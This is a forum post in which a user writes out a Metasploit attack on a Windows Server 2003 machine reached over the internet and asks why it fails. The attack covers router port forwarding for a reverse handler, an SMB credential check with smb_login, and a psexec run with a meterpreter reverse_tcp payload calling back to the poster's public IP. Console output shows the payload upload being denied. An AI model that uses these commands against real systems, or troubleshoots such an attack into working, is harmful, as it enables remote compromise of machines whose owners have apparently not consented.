Jump to content

mbarakoda

Members
  • Posts

    1
  • Joined

  • Last visited

Everything posted by mbarakoda

  1. Target OS: Windows 2003 SP2 EN Target public ip : XX.XX.XX.XX Target Open port: 445 My OS: windows 7 My public ip : YY.YY.YY.YY my local ip: 192.168.2.42 my router SMC Due to the fact that the target is not on the same LAN, and the attach will be over the internet, i start with setting port forward from router settings as the following: Name:AUTH - Protocol:TCP/UDP - WAN Port:4444 - Server Host Port:4444 - Server IP Address 192.168.2.42 I installed metasploit and start with checking if the credentials are valid or not by running scanner/smb/smb_login as following msf> use scanner/smb/smb_login msf auxiliary(smb_login) > set rhosts XX.XX.XX.XX rhosts => XX.XX.XX.XX msf auxiliary(smb_login) > set smbuser root smbuser => root msf auxiliary(smb_login) > set smbpass password smbpass => password msf auxiliary(smb_login) > run [*] XX.XX.XX.XX:445 SMB - Starting SMB login bruteforce [-] XX.XX.XX.XX - This system allows guest sessions with any credentials, these instances will not be reported. [-] XX.XX.XX.XX:445 SMB - [1/3] - |WORKGROUP - FAILED LOGIN (Windows Server 2003 3790 Service Pack 2) root : (STATUS_LOGON_FAILURE) [-] XX.XX.XX.XX:445 SMB - [2/3] - |WORKGROUP - FAILED LOGIN (Windows Server 2003 3790 Service Pack 2) root : root (STATUS_LOGON_FAILURE) [*] Auth-User: "root" [+] XX.XX.XX.XX:445|WORKGROUP - SUCCESSFUL LOGIN (Windows Server 2003 3790 Service Pack 2) 'root' : 'password' [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed then after login successful, i try to use exploit/windows/smb/psexec to exploit the server by the following: msf > use exploit/windows/smb/psexec msf exploit(psexec) > set rhost XX.XX.XX.XX rhost => XX.XX.XX.XX msf exploit(psexec) > set smbuser root smbuser => root msf exploit(psexec) > set smbpass password smbpass => password msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(psexec) > set lhost YY.YY.YY.YY lhost => YY.YY.YY.YY msf exploit(psexec) > set lport 4444 lport => 4444 msf exploit(psexec) > exploit [-] Handler failed to bind to YY.YY.YY.YY:4444 [*] Started reverse handler on 0.0.0.0:4444 [*] Connecting to the server... [*] Authenticating to XX.XX.XX.XX:445|WORKGROUP as user 'root'... [*] Uploading payload... [-] Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::ErrorCode The server responded with error: STATUS_ACCESS_DENIED (Command=117 WordCount=0) but as you see the exploit failed although the credentials are valid and confirmed above, can you help me understand what's wrong on the above?
×
×
  • Create New...